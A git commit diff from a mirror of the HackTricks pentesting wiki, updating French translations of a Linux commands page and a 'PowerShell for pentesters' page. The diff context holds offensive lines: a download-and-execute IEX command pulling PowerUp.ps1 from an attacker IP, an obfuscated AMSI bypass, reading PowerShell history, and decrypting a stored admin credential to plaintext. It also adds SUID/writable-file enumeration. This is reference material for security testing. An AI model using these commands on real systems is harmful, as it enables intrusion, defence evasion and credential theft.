mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 14:40:37 +00:00
Translated ['linux-hardening/useful-linux-commands/README.md', 'windows-
This commit is contained in:
parent
52785afa5f
commit
0192af8a73
2 changed files with 49 additions and 10 deletions
|
@ -17,7 +17,7 @@ Autres moyens de soutenir HackTricks :
|
|||
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
|
||||
* Obtenez le [**merchandising officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Découvrez [**La Famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection d'[**NFTs**](https://opensea.io/collection/the-peass-family) exclusifs
|
||||
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-moi** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Partagez vos astuces de hacking en soumettant des PR aux dépôts github** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
@ -249,6 +249,35 @@ grep -Po 'd{3}[s-_]?d{3}[s-_]?d{4}' *.txt > us-phones.txt
|
|||
#Extract ISBN Numbers
|
||||
egrep -a -o "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b" *.txt > isbn.txt
|
||||
```
|
||||
## Trouver
|
||||
```bash
|
||||
# Find SUID set files.
|
||||
find / -perm /u=s -ls 2>/dev/null
|
||||
|
||||
# Find SGID set files.
|
||||
find / -perm /g=s -ls 2>/dev/null
|
||||
|
||||
# Found Readable directory and sort by time. (depth = 4)
|
||||
find / -type d -maxdepth 4 -readable -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
|
||||
|
||||
# Found Writable directory and sort by time. (depth = 10)
|
||||
find / -type d -maxdepth 10 -writable -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
|
||||
|
||||
# Or Found Own by Current User and sort by time. (depth = 10)
|
||||
find / -maxdepth 10 -user $(id -u) -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
|
||||
|
||||
# Or Found Own by Current Group ID and Sort by time. (depth = 10)
|
||||
find / -maxdepth 10 -group $(id -g) -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
|
||||
|
||||
# Found Newer files and sort by time. (depth = 5)
|
||||
find / -maxdepth 5 -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less
|
||||
|
||||
# Found Newer files only and sort by time. (depth = 5)
|
||||
find / -maxdepth 5 -type f -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less
|
||||
|
||||
# Found Newer directory only and sort by time. (depth = 5)
|
||||
find / -maxdepth 5 -type d -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less
|
||||
```
|
||||
## Aide à la recherche Nmap
|
||||
```bash
|
||||
#Nmap scripts ((default or version) and smb))
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# Notions de base de PowerShell pour les Pentesters
|
||||
# Notions de base de PowerShell pour les pentesteurs
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -9,7 +9,7 @@ Autres moyens de soutenir HackTricks :
|
|||
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
|
||||
* Obtenez le [**merchandising officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Découvrez [**La Famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection d'[**NFTs**](https://opensea.io/collection/the-peass-family) exclusifs
|
||||
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez**-moi sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-moi** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Partagez vos astuces de piratage en soumettant des PR aux dépôts github** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
@ -28,7 +28,7 @@ Get-Help Get-Item -Examples #List examples
|
|||
Import-Module <modulepath>
|
||||
Get-Command -Module <modulename>
|
||||
```
|
||||
## Téléchargement & Exécution
|
||||
## Télécharger & Exécuter
|
||||
```powershell
|
||||
g
|
||||
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
|
||||
|
@ -129,13 +129,13 @@ ValueData : 0
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
### Contournement de AMSI
|
||||
### Contournement de l'AMSI
|
||||
|
||||
**`amsi.dll`** est **chargé** dans votre processus et possède les **exports** nécessaires pour toute interaction avec une application. Et comme il est chargé dans l'espace mémoire d'un processus que vous **contrôlez**, vous pouvez changer son comportement en **réécrivant les instructions en mémoire**. Cela le rend incapable de détecter quoi que ce soit.
|
||||
|
||||
Par conséquent, l'objectif des contournements de AMSI que vous allez voir est de **réécrire les instructions de cette DLL en mémoire pour rendre la détection inutile**.
|
||||
Par conséquent, l'objectif des contournements de l'AMSI que vous allez voir est de **réécrire les instructions de cette DLL en mémoire pour rendre la détection inutile**.
|
||||
|
||||
Page web du **générateur de contournement AMSI** : [**https://amsi.fail/**](https://amsi.fail/)
|
||||
Page web du **générateur de contournement de l'AMSI** : [**https://amsi.fail/**](https://amsi.fail/)
|
||||
```powershell
|
||||
# A Method
|
||||
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
|
||||
|
@ -193,7 +193,7 @@ Les étapes pour réaliser le hooking d'appel d'API des méthodes .NET sont :
|
|||
3. Utiliser la réflexion pour trouver les méthodes
|
||||
4. S'assurer que chaque méthode a été compilée
|
||||
5. Trouver l'emplacement de chaque méthode en mémoire
|
||||
6. Écraser la méthode cible avec des instructions pointant vers notre méthode malveillante
|
||||
6. Écraser la méthode cible avec des instructions pointant vers notre méthode malveilleuse
|
||||
|
||||
### Contournement AMSI 3 - Privilège SeDebug
|
||||
|
||||
|
@ -202,12 +202,22 @@ Les étapes pour réaliser le hooking d'appel d'API des méthodes .NET sont :
|
|||
### Contournement AMSI - Plus de Ressources
|
||||
|
||||
+ [S3cur3Th1sSh1t/Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell)
|
||||
+ [Contournement d'AMSI sur Windows 11 en 2023](https://gustavshen.medium.com/bypass-amsi-on-windows-11-75d231b2cac6) [Github](https://github.com/senzee1984/Amsi_Bypass_In_2023)
|
||||
+ [Contournement AMSI sur Windows 11 en 2023](https://gustavshen.medium.com/bypass-amsi-on-windows-11-75d231b2cac6) [Github](https://github.com/senzee1984/Amsi_Bypass_In_2023)
|
||||
|
||||
## Historique PS-History
|
||||
```powershell
|
||||
Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
|
||||
```
|
||||
## Trouver des fichiers récents
|
||||
|
||||
Options : `CreationTime`, `CreationTimeUtc`, `LastAccessTime`, `LastAccessTimeUtc`, `LastWriteTime`, `LastWriteTimeUtc`
|
||||
```powershell
|
||||
# LastAccessTime:
|
||||
(gci C:\ -r | sort -Descending LastAccessTime | select -first 100) | Select-Object -Property LastAccessTime,FullName
|
||||
|
||||
# LastWriteTime:
|
||||
(gci C:\ -r | sort -Descending LastWriteTime | select -first 100) | Select-Object -Property LastWriteTime,FullName
|
||||
```
|
||||
## Obtenir des permissions
|
||||
```powershell
|
||||
Get-Acl -Path "C:\Program Files\Vuln Services" | fl
|
||||
|
@ -310,7 +320,7 @@ $pw=gc admin-pass.xml | convertto-securestring #Get the securestring from the fi
|
|||
$cred=new-object system.management.automation.pscredential("administrator", $pw)
|
||||
$cred.getnetworkcredential() | fl * #Get plaintext password
|
||||
```
|
||||
## Tâches planifiées
|
||||
## Tâches Planifiées
|
||||
```powershell
|
||||
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
|
||||
```
|
||||
|
|
Loading…
Reference in a new issue